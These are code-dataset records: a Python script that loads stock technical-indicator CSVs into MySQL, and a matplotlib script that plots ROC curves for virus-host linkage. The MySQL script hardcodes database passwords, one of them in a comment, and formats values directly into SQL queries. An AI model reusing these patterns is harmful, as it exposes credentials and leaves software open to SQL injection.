"datetime.datetime.now", "line_number": 190, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 190, "usage_type": "attribute"}, {"api_name": "datetime.datetime.fromtimestamp", "line_number": 192, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 192, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations.MINUTELY", "line_number": 193, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 193, "usage_type": "name"}, {"api_name": "haymetric.Rotations.HOURLY", "line_number": 195, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 195, "usage_type": "name"}, {"api_name": "haymetric.Rotations.DAILY", "line_number": 197, "usage_type": "attribute"}, {"api_name": "haymetric.Rotations", "line_number": 197, "usage_type": "name"}, {"api_name": "haymetric.Metrics", "line_number": 201, "usage_type": "call"}, {"api_name": "haymetric.Metrics", "line_number": 205, "usage_type": "call"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 229, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 229, "usage_type": "name"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 230, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 230, "usage_type": "name"}, {"api_name": "haymetric.Units.MILLISECOND", "line_number": 231, "usage_type": "attribute"}, {"api_name": "haymetric.Units", "line_number": 231, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 237, "usage_type": "call"}]} {"seq_id": "105105068", "text": "#coding=utf-8\r\n#!/home/pi/miniconda3/envs/py36/bin/python\r\n\r\nfrom datetime import datetime\r\nimport pandas as pd\r\nimport re\r\nimport numpy as np\r\nfrom sqlalchemy import create_engine\r\nimport mysql.connector\r\nimport re\r\nimport csv\r\nimport time\r\nimport shutil\r\nimport os\r\nimport io\r\nfrom pandas import isnull\r\nfrom glob import glob\r\n\r\n# ip = '182.155.205.224'\r\n\r\nip = '127.0.0.1'\r\n\r\n# engine = create_engine( \"mysql+mysqldb://root:28wC75#D@127.0.0.1/StockDB?charset=utf8\" )\r\n\r\nenginePi = create_engine( 'mysql+mysqlconnector://pregaine:RF69xy7C@{}/mysql?charset=utf8'.format( ip ) )\r\n\r\ndef StrToDateFormat( data, val ):\r\n # print( 'data {}, val {}'.format( data, val ) )\r\n \r\n dt = datetime.strptime( val, 
'%y%m%d' )\r\n val = dt.strftime( \"%y-%m-%d\" )\r\n\r\n return val\r\n\r\n\r\nclass DB_TechAnalysis:\r\n\r\n def __init__( self, server, database, username, password ):\r\n\r\n self.df = pd.DataFrame( )\r\n self.src_df = pd.DataFrame( )\r\n\r\n self.d = { '月': 'TECH_M' }\r\n\r\n self.datelst = [ ]\r\n print( \"Initial Database connection...\" + database )\r\n self.dbname = database\r\n \r\n self.con_db = mysql.connector.connect( host = server,\r\n user = username,\r\n passwd = password,\r\n database = database,\r\n charset = \"utf8\"\r\n )\r\n \r\n self.cur_db = self.con_db.cursor( buffered = True )\r\n self.con_db.commit( )\r\n\r\n # TODO 如何查當下SQL 語言及時間格式\r\n # cmd = \"\"\"SET LANGUAGE us_english; set dateformat ymd;\"\"\"\r\n # self.cur_db.execute( cmd )\r\n\r\n self.stock = ''\r\n self.date = ''\r\n\r\n def ResetTable( self, data ):\r\n\r\n d = dict( 分 = 'DROP TABLE IF EXISTS TECH_H', \r\n 日 = 'DROP TABLE IF EXISTS TECH_D',\r\n 周 = 'DROP TABLE IF EXISTS TECH_W', \r\n 月 = 'DROP TABLE IF EXISTS TECH_M' )\r\n\r\n # Do some setup\r\n self.cur_db.execute( d[ data ] )\r\n \r\n print( 'Successfully Deleter ' + data )\r\n\r\n def CreateTable( self, data ):\r\n\r\n \r\n sql_m_cmd = '''\r\n CREATE TABLE mysql.TECH_M \r\n (\r\n stock varchar( 10 ) COLLATE utf8_bin NOT NULL,\r\n date DATE NOT NULL,\r\n \r\n open_price decimal(10, 2) NULL,\r\n high_price decimal(10, 2) NULL,\r\n low_price decimal(10, 2) NULL,\r\n close_price decimal(10, 2) NULL,\r\n volume bigint NULL,\r\n \r\n ma3 decimal(10, 2) NULL,\r\n ma6 decimal(10, 2) NULL,\r\n ma12 decimal(10, 2) NULL,\r\n ma24 decimal(10, 2) NULL,\r\n ma36 decimal(10, 2) NULL,\r\n ma60 decimal(10, 2) NULL,\r\n ma120 decimal(10, 2) NULL,\r\n \r\n rsi2 decimal(10, 2) NULL,\r\n rsi5 decimal(10, 2) NULL,\r\n rsi10 decimal(10, 2) NULL,\r\n \r\n k9_3 decimal(10, 2) NULL,\r\n d9_3 decimal(10, 2) NULL,\r\n k3_2 decimal(10, 2) NULL,\r\n d3_3 decimal(10, 2) NULL,\r\n \r\n mfi4 decimal(10, 2) NULL,\r\n mfi6 decimal(10, 2) NULL,\r\n mfi14 decimal(10, 2) NULL,\r\n\r\n macd_dif_6 decimal(10, 2) NULL,\r\n dem_12 decimal(10, 2) NULL,\r\n osc_6_12_9 decimal(10, 2) NULL,\r\n\r\n macd_dif_12 decimal(10, 2) NULL,\r\n dem_26 decimal(10, 2) NULL,\r\n osc6_12_26_9 decimal(10, 2) NULL,\r\n\r\n willr9 decimal(10, 2) NULL,\r\n willr18 decimal(10, 2) NULL,\r\n willr42 decimal(10, 2) NULL,\r\n willr14 decimal(10, 2) NULL,\r\n willr24 decimal(10, 2) NULL,\r\n willr56 decimal(10, 2) NULL,\r\n willr72 decimal(10, 2) NULL,\r\n \r\n plus_di decimal(10, 2) NULL,\r\n minus_di decimal(10, 2) NULL,\r\n dx decimal(10, 2) NULL,\r\n adx decimal(10, 2) NULL,\r\n upperband decimal(10, 2) NULL,\r\n middleband decimal(10, 2) NULL,\r\n dnperband decimal(10, 2) NULL,\r\n bb decimal(10, 2) NULL,\r\n w20 decimal(10, 2) NULL,\r\n bias20 decimal(10, 2) NULL,\r\n bias60 decimal(10, 2) NULL,\r\n\r\n INDEX name ( stock, date ),\r\n INDEX idx_stock ( stock ),\r\n INDEX idx_date ( date )\r\n\r\n )\r\n '''\r\n\r\n table_d = { '月': sql_m_cmd }\r\n\r\n self.cur_db.execute( table_d[ data ] )\r\n \r\n print( 'Successfully Create 技術指標 ' + data )\r\n\r\n def CompareDB( self, data ):\r\n \r\n # print( table_name, stock_num )\r\n \r\n cmd = 'SELECT date, volume FROM {0} WHERE stock = \\'{1}\\''.format( self.d[ data ], self.stock )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchall( )\r\n \r\n lst = [ ]\r\n\r\n for val in ft:\r\n \r\n date = val[ 0 ].strftime( '%y%m%d' )\r\n\r\n volume = val[ 1 ]\r\n \r\n lst.append( ( date, volume ) )\r\n\r\n df = pd.DataFrame( lst, columns = [ '日期', '成交量_資料庫取出' ] 
)\r\n # print( df.head( 5 ) )\r\n left = pd.merge( self.df, df, on = [ '日期' ], how = 'left' )\r\n left = left[ left[ '成交量_資料庫取出' ] != left[ '成交量' ] ]\r\n del left[ '成交量_資料庫取出' ]\r\n \r\n self.df = left \r\n \r\n for index, row in self.df.iterrows( ):\r\n # print( self.stock, row[ '日期' ] )\r\n self.FindDuplicate( row[ '日期' ] )\r\n \r\n # print( data, '刪除重覆寫入' )\r\n # print( self.df )\r\n\r\n def ReadCSV( self, file ):\r\n \r\n self.df = pd.read_csv( file, \r\n sep = ',', \r\n encoding = 'utf8', \r\n false_values = 'NA', \r\n dtype = { '日期': str } )\r\n \r\n self.df = self.df.replace( [ np.inf, -np.inf ], np.nan ) \r\n \r\n # self.df = self.df[ : 20 ]\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = \"%y%m%d\" ) \r\n # print( self.df )\r\n\r\n def FindDuplicate( self, data ):\r\n\r\n # 尋找重覆資料\r\n cmd = 'SELECT stock, date from mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = '''DELETE FROM mysql.TECH_M where stock = \\'{}\\' and date = \\'{}\\';'''.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n\r\n '''\r\n # 尋找重覆資料\r\n # cmd = 'SELECT stock, date from mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n ft = self.cur_db.fetchone( )\r\n \r\n # print( '比對資料庫{0:>10} {1}'.format( self.stock, data ) )\r\n\r\n if ft is not None:\r\n \r\n cmd = 'DELETE FROM mysql.TECH_W WHERE stock = \\'{}\\' and date = \\'{}\\';'.format( self.stock, data )\r\n \r\n # print( cmd )\r\n \r\n self.cur_db.execute( cmd )\r\n \r\n print( '刪除重覆資料{0:>10} {1}'.format( self.stock, data ) )\r\n \r\n self.con_db.commit( )\r\n '''\r\n\r\n def WriteDB( self, data ):\r\n \r\n \r\n '''\r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n lst = self.df.values.tolist( )\r\n\r\n if len( lst ) == 0:\r\n # print( '資料庫比對CSV無新資料 {}'.format( self.stock ) )\r\n return\r\n \r\n columns = [ 'stock', 'date', 'open_price', 'high_price ', 'low_price', 'close_price', 'volume',\r\n 'ma4', 'ma12', 'ma24', 'ma48', 'ma96', 'ma144', 'ma240', 'ma480', 'rsi2', 'rsi3',\r\n 'rsi4', 'rsi5', 'rsi10', 'k9_3', 'd9_3', 'k3_2', 'd3_3', 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', 'willr9',\r\n 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72', 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n \r\n lenVal = len( columns )\r\n \r\n var_string = ','.join( [ '%s' ] * lenVal )\r\n \r\n for val in lst:\r\n \r\n val[ 0 ] = self.stock\r\n \r\n # print( val ) \r\n # exit()\r\n \r\n # dt = datetime.strptime( val[ 1 ], '%y%m%d' )\r\n # val[ 1 ] = dt.strftime( \"%y-%m-%d\" )\r\n \r\n query_string = 'INSERT INTO mysql.TECH_W VALUES ( {} );'.format( var_string )\r\n\r\n # print( query_string )\r\n # print( '取出{}'.format( val ) )\r\n \r\n self.cur_db.execute( query_string, val )\r\n \r\n print( '寫入資料庫 {} {}'.format( val[ 0 ], val[ 1 ] ) )\r\n \r\n ''' \r\n \r\n \r\n self.df = self.df.astype( object ).where( pd.notnull( self.df ), None )\r\n\r\n if self.df.empty:\r\n # print( '{:<7}exist DB'.format( self.stock ) 
)\r\n return\r\n\r\n del self.df[ 'Unnamed: 0' ]\r\n self.df.insert( 0, 'stock', self.stock )\r\n\r\n # self.df[ '日期' ] = pd.to_datetime( self.df[ '日期' ], format = '%y%m%d' )\r\n # self.df[ '日期' ] = self.df[ '日期' ].dt.strftime( \"%y-%m-%d\" )\r\n\r\n # print( self.df, self.d[ data ] )\r\n\r\n \r\n self.df.columns = [ 'stock', 'date', 'open_price', 'high_price', 'low_price', 'close_price', 'volume',\r\n 'ma3', 'ma6', 'ma12', 'ma24', 'ma36', 'ma60', 'ma120',\r\n 'rsi2', 'rsi5', 'rsi10', \r\n 'k9_3', 'd9_3', 'k3_2', 'd3_3', \r\n 'mfi4', 'mfi6', 'mfi14',\r\n 'macd_dif_6', 'dem_12', 'osc_6_12_9', 'macd_dif_12', 'dem_26', 'osc6_12_26_9', \r\n 'willr9', 'willr18', 'willr42', 'willr14', 'willr24', 'willr56', 'willr72',\r\n 'plus_di', 'minus_di',\r\n 'dx', 'adx', 'upperband', 'middleband', 'dnperband', 'bb', 'w20', 'bias20', 'bias60' ]\r\n\r\n\r\n # Try to send it to the access database (and fail)\r\n self.df.to_sql( name = self.d[ data ], \r\n con = enginePi, \r\n index = False, \r\n if_exists = 'append', \r\n index_label = None )\r\n \r\n print( '寫入資料庫{0:>2}{1:>7} {2}'.format( data, self.stock, self.date ) )\r\n\r\ndef main( ):\r\n \r\n db_M = DB_TechAnalysis( ip, 'mysql', 'pregaine', 'RF69xy7C' )\r\n \r\n # 移除表格\r\n db_M.ResetTable( '月' )\r\n\r\n # 建立資料表\r\n db_M.CreateTable( '月' )\r\n \r\n stock_M = { '月': [ db_M, '_月線技術指標.csv' ] }\r\n\r\n path = '/home/pi/Downloads/技術指標/month/'\r\n\r\n # 讀取資料夾\r\n for file in glob( '{}*_月線技術指標.csv'.format( path ) ):\r\n \r\n if os.path.getsize( file ) == 0:\r\n continue\r\n \r\n num = file.split( '_' )[ 0 ]\r\n num = num.replace( path, '' )\r\n data = file[ -10:-9 ]\r\n\r\n # print( file )\r\n\r\n if data in stock_M.keys( ):\r\n \r\n Obj = stock_M[ data ][ 0 ]\r\n Obj.stock = num\r\n \r\n print( '讀取 {}'.format( file ) )\r\n print( '股號 {}'.format( num ) )\r\n \r\n print( data )\r\n \r\n # if num != '2887':\r\n # continue\r\n\r\n Obj.ReadCSV( file )\r\n Obj.CompareDB( data ) \r\n Obj.WriteDB( data )\r\n\r\n else:\r\n print( '讀取錯誤 {}'.format( data ) )\r\n \r\n # exit()\r\n \r\nif __name__ == '__main__':\r\n\r\n start_tmr = time.time( )\r\n main( )\r\n print( '{:04.1f}'.format( (time.time( ) - start_tmr) ) )\r\n", "sub_path": "寫入技術指標月.py", "file_name": "寫入技術指標月.py", "file_ext": "py", "file_size_in_byte": 12638, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "sqlalchemy.create_engine", "line_number": 25, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 30, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 30, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 41, "usage_type": "call"}, {"api_name": "mysql.connector.connector.connect", "line_number": 49, "usage_type": "call"}, {"api_name": "mysql.connector.connector", "line_number": 49, "usage_type": "attribute"}, {"api_name": "mysql.connector", "line_number": 49, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 175, "usage_type": "call"}, {"api_name": "pandas.merge", "line_number": 177, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 192, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 198, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 198, "usage_type": "attribute"}, {"api_name": "pandas.notnull", "line_number": 299, "usage_type": "call"}, {"api_name": "glob.glob", "line_number": 349, "usage_type": "call"}, 
{"api_name": "os.path.getsize", "line_number": 351, "usage_type": "call"}, {"api_name": "os.path", "line_number": 351, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 384, "usage_type": "call"}, {"api_name": "time.time", "line_number": 386, "usage_type": "call"}]} {"seq_id": "360103892", "text": "#!/usr/bin/env python3\nimport matplotlib.pyplot as plt\nimport matplotlib.gridspec as gridspec\nimport matplotlib\nimport os\n\n\n# plotting constants\nPERCENTILE_CATEGORIES = [20, 50, 70, 90]\nCOLOR_CATEGORIES = [\"#000033\", \"#000099\", \"#0000ff\", \"#6666ff\"]\nPERCENTILE_TICKS = [0, 20, 40, 60, 80, 100]\nGRID_ALPHA = 0.2\nLINE_ALPHA = 0.1\nMARKER_ALPHA = 0.6\nTITLE_FONT = 16\nAXIS_FONT = 14\nMAIN_FONT = 12\nLABEL_FONT = 10\nMAIN_COLOR = 'k'\nSECONDARY_COLOR = \"r\"\nMAIN_LINEWIDTH = 1\nMARKER_SIZE = 2\nBAR_WIDTH = 0.85\nHISTOGRAM_BINS = 50\nPNG_DPI = 300\n\n\ndef initialize_plot_style():\n \"\"\"\n Set matplotlib visual style\n Returns: None\n\n \"\"\"\n matplotlib.style.use('ggplot')\n plt.rcParams['lines.linewidth'] = MAIN_LINEWIDTH\n plt.rcParams['axes.facecolor'] = 'w'\n plt.rcParams['xtick.color'] = MAIN_COLOR\n plt.rc('xtick', labelsize=LABEL_FONT)\n plt.rc('ytick', labelsize=LABEL_FONT)\n\n\ndef load_host_links(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n bacteria = cut[5]\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if adjusted_inter_vs_intra_ratio < 0.1:\n continue\n if virus not in data:\n data[virus] = list()\n data[virus].append(copy_count)\n return data\n\n\ndef load_validation(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n continue\n threshold = float(cut[0])\n support = float(cut[-1])\n data[threshold] = support\n return data\n\n\ndef categorize_data_for_roc_analysis(host_data, min_value, max_value, increment):\n \"\"\"\n Go over and generate copy count threshold values and store the number of links kept at each cut off point\n Args:\n host_data (dict)\n min_value (float): lowest value to test as threshold\n max_value (float): highest value to test as threshold\n increment (float): multiplier to use for incrementing threshold\n Returns:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n\n \"\"\"\n print(\"Generating ROC categories\")\n roc_data = dict()\n threshold_values = list()\n threshold = min_value\n while threshold < max_value:\n roc_data[threshold] = [0, set()]\n threshold_values.append(threshold)\n threshold *= increment\n for mobile_contig, copy_counts in host_data.items():\n for copy_count in copy_counts:\n for threshold in threshold_values:\n if threshold > copy_count:\n break\n roc_data[threshold][0] += 1\n roc_data[threshold][1].add(mobile_contig)\n for threshold in threshold_values:\n roc_data[threshold][1] = len(roc_data[threshold][1])\n return roc_data, threshold_values\n\n\ndef generate_roc_curve_values(roc_data, threshold_values, min_value):\n \"\"\"\n Generate the x and y values of the copy count thresholding ROC curve\n 
Args:\n roc_data (dict[float:list]): host hits remaining at each copy count threshold\n threshold_values (list[float]): copy count threshold generated\n min_value (float): lowest value to test as threshold\n Returns:\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC curve\n\n \"\"\"\n print(\"Generating ROC curve\")\n true_positives = list()\n false_positives = list()\n max_possible_hits_accepted = roc_data[min_value][0]\n max_possible_mobile_contigs_with_hosts = roc_data[min_value][1]\n for threshold in threshold_values:\n hits_accepted = roc_data[threshold][0]\n false_positives.append(hits_accepted / max_possible_hits_accepted)\n mobile_contigs_with_hosts = roc_data[threshold][1]\n true_positives.append(mobile_contigs_with_hosts / max_possible_mobile_contigs_with_hosts)\n return true_positives, false_positives\n\n\ndef calculate_area_under_curve(false_positives, true_positives):\n \"\"\"\n Calculate the area under a ROC curve\n Args:\n false_positives (list): x-values of a ROC curve\n true_positives (list): y-values of a ROC curve\n Returns:\n auc (float): area under the curve\n\n \"\"\"\n print(\"Calculating AUC\")\n auc = 0\n for i, false_positive in enumerate(false_positives):\n if i + 1 == len(false_positives):\n break\n x_delta = false_positives[i] - false_positives[i + 1]\n height = (true_positives[i] + true_positives[i + 1]) / 2\n auc += x_delta * height\n print(f\"ROC area under curve = {auc}\")\n return auc\n\n\ndef get_optimal_threshold(threshold_values, true_positives, false_positives, min_fraction_without_hosts=0.8):\n \"\"\"\n Run down the ROC curve and stop when the optimal threshold has been reached\n Args:\n threshold_values (list[float]): copy count threshold generated\n true_positives (list[float]): y-axis values of ROC curve\n false_positives: (list[float]): x-axis values of ROC curve\n min_fraction_without_hosts (float): lowest acceptable fraction of mobile elements still with a host\n Returns:\n optimal_threshold (float): the optimal copy count value\n fp_rate (float): the x-value on the ROC curve of the optimal cut-off\n tp_rate (float): the y-value on the ROC curve of the optimal cut-off\n\n \"\"\"\n print(\"Calculating optimal threshold\")\n optimal_threshold = 0\n fp_rate = 0\n tp_rate = 0\n for i, threshold in enumerate(threshold_values):\n optimal_threshold = threshold\n fp_rate = false_positives[i]\n tp_rate = true_positives[i]\n if fp_rate + tp_rate < 1 or tp_rate < min_fraction_without_hosts:\n break\n print(f\"Optimal value = {optimal_threshold}\")\n return optimal_threshold, fp_rate, tp_rate\n\n\ndef plot_roc_curve(ax, true_positives, false_positives, fp_rate=1, tp_rate=1, optimal_threshold=None, auc=None):\n print(f\"Drawing ROC curve\")\n ax.plot(false_positives, true_positives, c=\"k\", alpha=0.3)\n ax.scatter(false_positives, true_positives, c=\"k\", alpha=0.6)\n ax.scatter([fp_rate], [tp_rate], c=\"r\")\n ax.plot([0, 1], [1, 0], \"--\", c=\"r\", alpha=0.5)\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-0.01, 1.01)\n ax.set_xlabel(\"Fraction of all hits kept\")\n ax.set_ylabel(\"Fraction of viruses with one host\")\n if auc is not None:\n auc = round(auc, 2)\n optimal_threshold = round(optimal_threshold, 2)\n ax.text(0.25, 0.78, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\ndef plot_host_validation(ax, prophage_validation, color=\"k\", label=None):\n xs = list()\n ys = list()\n chosen_validation = 0\n for 
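# calculate_area_under_curve() above is the trapezoidal rule written out by hand, walking
# the ROC curve from high to low false-positive rate. A quick equivalence check against
# NumPy (np.trapz; renamed np.trapezoid in NumPy 2.0) on hypothetical curve points:
import numpy as np

fp = [1.0, 0.6, 0.3, 0.0]   # decreasing x-values, as generate_roc_curve_values() produces
tp = [1.0, 0.9, 0.7, 0.0]
manual = sum((fp[i] - fp[i + 1]) * (tp[i] + tp[i + 1]) / 2 for i in range(len(fp) - 1))
assert abs(manual - (-np.trapz(tp, fp))) < 1e-12   # sign flips because fp is decreasing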
x, y in prophage_validation.items():\n xs.append(x)\n ys.append(y)\n if x == 0.14:\n chosen_validation = y\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, c=color, alpha=0.3)\n ax.axvline(0.14, linestyle=\"--\", c=\"r\", alpha=0.4)\n ax.scatter(xs, ys, c=color, alpha=0.6, label=label)\n ax.scatter([0.14], [chosen_validation], c=\"r\")\n\n ax.set_xlim(-0.01, 1.01)\n ax.set_ylim(-1, 101)\n ax.set_xlabel(\"Minimum copy count threshold\")\n ax.set_ylabel(\"Percent validated prophage hosts\")\n ax.text(0.17, 70, f\"Chosen threshold\\n(0.14 copies per cell)\", c=\"r\")\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n\n\n\ndef load_rarefaction_data(directory):\n master_data = dict()\n for filename in os.listdir(directory):\n path = os.path.join(directory, filename)\n read_ct = int(filename.split(\".\")[0].split(\"_\")[-1])\n data = load_host_links_all(path)\n master_data[read_ct] = data\n return master_data\n\n\ndef load_host_links_all(filename):\n print(f\"Loading data from {filename}\")\n data = dict()\n with open(filename) as input:\n for i, line in enumerate(input):\n cut = line.strip().split(\"\\t\")\n if i == 0:\n if cut[0] != \"mobile_contig_name\" or \\\n cut[5] != \"cluster_name\" or \\\n cut[14] != \"mobile_element_copies_per_cell\":\n raise ImportError(\"not a good master table\")\n continue\n virus = cut[0]\n viral_depth = float(cut[3])\n bacteria = cut[5]\n intra_links = float(cut[9])\n inter_links = float(cut[11])\n if inter_links < 5 or intra_links < 10:\n continue\n links = int(cut[11])\n host_depth = float(cut[8])\n norm_links = (links / host_depth) / viral_depth\n copy_count = float(cut[14])\n adjusted_inter_vs_intra_ratio = float(cut[16])\n if virus not in data:\n data[virus] = dict()\n data[virus][bacteria] = (links, norm_links, copy_count, adjusted_inter_vs_intra_ratio)\n return data\n\n\ndef get_contig_host_pool(master_data, min_count=4, max_to_plot=10):\n contig_host_pool = dict()\n for data in master_data.values():\n for virus, subdata in data.items():\n for host in subdata:\n contig_host = f\"{virus}:{host}\"\n if contig_host not in contig_host_pool:\n contig_host_pool[contig_host] = 0\n contig_host_pool[contig_host] += 1\n filtered_contig_host_pool = set()\n for contig_host, count in contig_host_pool.items():\n if len(filtered_contig_host_pool) > max_to_plot:\n break\n if count >= min_count:\n filtered_contig_host_pool.add(contig_host)\n print(f\"Kept {len(filtered_contig_host_pool)} out of {len(contig_host_pool)} virus:host links for plotting\")\n return filtered_contig_host_pool\n\n\ndef plot_data(contig_host_pool, master_data, n, ax):\n print(f\"plotting value {n}\")\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n xs = list()\n ys = list()\n for read_ct, data in master_data.items():\n if virus not in data:\n continue\n if host not in data[virus]:\n continue\n value = data[virus][host][n]\n xs.append(read_ct)\n ys.append(value)\n ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]\n xs.sort(reverse=True)\n ax.plot(xs, ys, \"-\", c=\"k\", alpha=0.03)\n # ax.plot(xs, ys, \"o\", c=\"k\", alpha=0.05, markersize=1)\n\n\ndef make_histogram_table(contig_host_pool, master_data, n):\n print(f\"making histogram data for value {n}\")\n bins = 50\n st = 0\n fi = 2\n bin_size = (fi - st) / bins\n\n xs = list()\n ys = list()\n x = st\n while x <= fi:\n read_ct 
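# The pairing idiom used in plot_host_validation() and plot_data() above --
#     ys = [x for y, x in sorted(zip(xs, ys), reverse=True)]
#     xs.sort(reverse=True)
# reorders both lists by descending x so each line plots cleanly; the loop variables are
# just confusingly named (y receives the x-coordinate). A drop-in equivalent with a
# single sort, reusing the xs and ys already built there:
pairs = sorted(zip(xs, ys), reverse=True)
xs, ys = [p[0] for p in pairs], [p[1] for p in pairs]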
= max(master_data.keys())\n data = master_data[read_ct]\n count = 0\n for i, contig_host in enumerate(contig_host_pool):\n if i % 1000 == 0 and i > 0:\n print(f\"processed {i} links\")\n virus = contig_host.split(\":\")[0]\n host = contig_host.split(\":\")[1]\n value = data[virus][host][n]\n if x <= value < x + bin_size:\n count += 1\n xs.append(x)\n ys.append(count)\n x += bin_size\n for i, x in enumerate(xs):\n y = ys[i]\n print(x, y, sep=\"\\t\")\n\n\ndef main():\n master_data = load_rarefaction_data(\"rarefaction_data\")\n contig_host_pool = get_contig_host_pool(master_data, min_count=1, max_to_plot=10000)\n\n host_data = load_host_links(\"unfiltered_master_table.tsv\")\n all_prophage_validation = load_validation(\"validation_values_all_prophages.tsv\")\n single_host_prophage_validation = load_validation(\"validation_values_singlehost_prophages.tsv\")\n\n min_value = 0.0001\n roc_data, threshold_values = categorize_data_for_roc_analysis(host_data, min_value, 1000, 1.1)\n true_positives, false_positives = generate_roc_curve_values(roc_data, threshold_values, min_value)\n auc = calculate_area_under_curve(false_positives, true_positives)\n optimal_threshold, fp_rate, tp_rate = get_optimal_threshold(threshold_values, true_positives, false_positives)\n\n print(\"plotting subplots\")\n fig = plt.figure(figsize=(15, 5.4))\n initialize_plot_style()\n gs = gridspec.GridSpec(nrows=2, ncols=3, figure=fig)\n ax1 = fig.add_subplot(gs[0, 0])\n plt.gca().invert_xaxis()\n ax2 = fig.add_subplot(gs[1, 0])\n plt.gca().invert_xaxis()\n ax3 = fig.add_subplot(gs[:, 1])\n ax4 = fig.add_subplot(gs[:, 2])\n\n #########################\n for i, ax in enumerate([ax1, ax2]):\n ax.set_xscale(\"log\")\n plot_data(contig_host_pool, master_data, i + 2, ax)\n ax.set_xlim(105000000, 95000)\n ax.grid(axis=\"both\", ls=\"--\", alpha=0.1, c=\"k\", which=\"major\")\n ax.set_ylim(-0.05, 3.05)\n ax2.set_xlabel(\"Hi-C library size (read count)\")\n ax1.set_ylabel(\"Copies per cell\")\n ax2.set_ylabel(\"Connectivity ratio (R')\")\n\n #########################\n plot_roc_curve(ax3, true_positives, false_positives, fp_rate=fp_rate, tp_rate=tp_rate,\n optimal_threshold=optimal_threshold, auc=auc)\n plot_host_validation(ax4, all_prophage_validation, label=\"All prophages\")\n plot_host_validation(ax4, single_host_prophage_validation, color=\"b\", label=\"Single-host prophages\")\n\n ax1.set_title(\"A\", fontsize=20, x=-0.1)\n ax2.set_title(\"B\", fontsize=20, x=-0.1, y=1.05)\n ax3.set_title(\"C\", fontsize=20, x=-0.1)\n ax4.set_title(\"D\", fontsize=20, x=-0.1)\n plt.tight_layout()\n plt.savefig(\"figure.png\", dpi=300)\n\n\nmain()\n", "sub_path": "figures/figure_roc_curve/draw.py", "file_name": "draw.py", "file_ext": "py", "file_size_in_byte": 14349, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "matplotlib.style.use", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.style", "line_number": 34, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 35, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 36, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.rcParams", "line_number": 37, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": 
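# make_histogram_table() above rescans every contig:host pair once per bin, i.e.
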